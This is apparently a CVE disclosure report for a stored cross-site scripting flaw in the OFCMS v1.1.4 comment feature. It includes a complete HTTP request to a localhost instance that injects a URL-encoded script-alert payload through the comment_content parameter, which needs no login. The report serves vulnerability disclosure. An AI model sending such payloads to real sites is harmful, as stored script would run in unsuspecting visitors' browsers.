Headline
CVE-2022-27961: There is a stored xss vulnerability exists in ofcms · Issue #I4Z8QU · 欧福/ofcms - Gitee.com
A cross-site scripting (XSS) vulnerability at /ofcms/company-c-47 in OFCMS v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comment text box.
[Suggested description]
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7000/ofcms/company-c-47.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=2F8C11250ADB9A9DA125C3A0F9B7C8BA
Connection: close
[Attack Type]
Remote
[Impact Code execution]
true
[Vulnerability to prove]